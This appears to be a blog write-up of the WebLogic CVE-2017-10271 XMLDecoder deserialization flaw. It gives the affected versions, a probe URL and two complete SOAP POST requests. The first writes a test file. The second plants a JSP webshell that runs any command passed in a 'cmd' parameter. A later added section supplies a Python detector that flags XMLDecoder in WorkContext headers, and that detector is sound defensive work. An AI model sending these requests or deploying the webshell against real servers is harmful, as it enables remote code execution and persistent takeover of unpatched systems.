WebLogic deserialization vulnerability (CVE-2017-10271)

Affected versions

Affected WebLogic versions: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0

Exploit

1: Preliminary check. Visit
http://x.x.x.x:7001/wls-wsat/CoordinatorPortType11. If the page shown in the
figure below is returned, the wls-wsat component is deployed and the server may be vulnerable.

2: Construct a POST request for testing that writes test.txt

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1353

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.6.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/cmd.jsp</string>
          <void method="println">
            <string>
xmldecoder_vul_test
</string>
          </void>
          <void method="close"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>



3: Write the cmd webshell (a JSP "little horse")

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 1353

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.6.0" class="java.beans.XMLDecoder">
        <object class="java.io.PrintWriter">
          <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/cmd.jsp</string>
          <void method="println">
            <string>
<![CDATA[
<%@ page import="java.util.*,java.io.*"%>
 <%
 %>
 <HTML><BODY>
 Commands with JSP
 <FORM METHOD="GET" NAME="myform" ACTION="">
 <INPUT TYPE="text" NAME="cmd">
 <INPUT TYPE="submit" VALUE="Send">
 </FORM>
 <pre>
 <%
 if (request.getParameter("cmd") != null) {
 out.println("Command: " + request.getParameter("cmd") + "<BR>");
 Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
 OutputStream os = p.getOutputStream();
 InputStream in = p.getInputStream();
 DataInputStream dis = new DataInputStream(in);
 String disr = dis.readLine();
 while ( disr != null ) {
 out.println(disr);
 disr = dis.readLine();
 }
 }
 %>
 </pre>
 </BODY></HTML>
]]>
</string>
          </void>
          <void method="close"/>
        </object>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>


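Seen from the defending side, the three steps above reduce to one request signature: a POST to a /wls-wsat/ endpoint whose SOAP WorkContext header (namespace http://bea.com/2004/06/soap/workarea/) carries a java.beans.XMLDecoder element, which then instantiates whatever class the attacker names (java.io.PrintWriter in this write-up). The script below is an added example, not code from the original post: it splits raw HTTP request text, parses the SOAP body and returns a verdict per request. The sample requests are constructed inline (PLACEHOLDER_PATH stands in for a real file path) and the function names are my own.

```python
"""Classify raw HTTP requests for the CVE-2017-10271 request pattern.

Added example, not from the original post. Samples below are constructed.
"""
import re
import xml.etree.ElementTree as ET

WORK_NS = "http://bea.com/2004/06/soap/workarea/"   # WorkContext namespace
XMLDECODER = "java.beans.XMLDecoder"                 # decoder class in the payload
WLS_WSAT = re.compile(r"^/wls-wsat/", re.IGNORECASE) # endpoint family from the write-up


def split_http_request(raw):
    """Split raw request text into (method, path, headers, body)."""
    parts = re.split(r"\r?\n\r?\n", raw, maxsplit=1)
    head = parts[0]
    body = parts[1] if len(parts) > 1 else ""
    lines = head.splitlines()
    method, path = lines[0].split()[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def inspect_soap_body(body):
    """Report whether a WorkContext header carries an XMLDecoder element.

    Returns: parsed (bool), workcontext (bool), xmldecoder (bool),
    classes (object classes the decoder would instantiate).
    """
    info = {"parsed": False, "workcontext": False, "xmldecoder": False, "classes": []}
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return info
    info["parsed"] = True
    for wc in root.iter("{%s}WorkContext" % WORK_NS):
        info["workcontext"] = True
        # The <java> element is unqualified (no namespace) in the known payloads.
        for java in wc.iter("java"):
            if java.get("class") == XMLDECODER:
                info["xmldecoder"] = True
                info["classes"].extend(
                    o.get("class") for o in java.iter("object") if o.get("class"))
    return info


def classify_request(raw):
    """Return {'path', 'verdict', 'reason'}; verdict is allow, suspicious or block."""
    method, path, headers, body = split_http_request(raw)
    result = {"path": path, "verdict": "allow", "reason": ""}
    if method.upper() != "POST" or not WLS_WSAT.match(path):
        return result
    info = inspect_soap_body(body)
    if info["xmldecoder"]:
        result["verdict"] = "block"
        result["reason"] = "XMLDecoder in WorkContext; classes=" + ",".join(info["classes"])
    elif not info["parsed"] and re.search(r"XMLDecoder|WorkContext", body, re.IGNORECASE):
        # Malformed XML that still names the decoder: a parse failure must not hide it.
        result["verdict"] = "suspicious"
        result["reason"] = "unparseable body mentions XMLDecoder/WorkContext"
    elif info["workcontext"]:
        result["verdict"] = "suspicious"
        result["reason"] = "WorkContext header present; verify against known clients"
    return result


# Constructed samples (not captured traffic). MALICIOUS mirrors the shape of the
# write-up's test payload: PrintWriter writing a marker string to a file.
_HEAD = ("POST /wls-wsat/CoordinatorPortType HTTP/1.1\r\n"
         "Host: weblogic.example.test\r\nContent-Type: text/xml\r\n\r\n")
BENIGN = (_HEAD
          + '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
          + "<soapenv:Header/><soapenv:Body/></soapenv:Envelope>")
MALICIOUS = (_HEAD
             + '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">'
             + '<soapenv:Header><work:WorkContext xmlns:work="' + WORK_NS + '">'
             + '<java version="1.6.0" class="java.beans.XMLDecoder">'
             + '<object class="java.io.PrintWriter"><string>PLACEHOLDER_PATH/marker.txt</string>'
             + '<void method="println"><string>xmldecoder_vul_test</string></void>'
             + '<void method="close"/></object></java></work:WorkContext></soapenv:Header>'
             + "<soapenv:Body/></soapenv:Envelope>")
MALFORMED = (_HEAD  # unbound prefixes and unclosed tags: ET.ParseError
             + '<soapenv:Envelope><soapenv:Header><work:WorkContext>'
             + '<java class="java.beans.XMLDecoder">')

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("malicious", MALICIOUS), ("malformed", MALFORMED)):
        print(name, classify_request(sample))
```

Run it over request bodies captured at a reverse proxy or WAF in front of the 7001 listener; any XMLDecoder element inside a WorkContext header is a block, since the decoder has no place in that header in normal traffic. A WorkContext header on its own is only marked for review, because work-area propagation is a regular WebLogic mechanism, and the regex fallback keeps a deliberately malformed body from slipping past the XML parser unflagged.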


Source: https://blog.csdn.net/weixin_44146996/article/details/113385605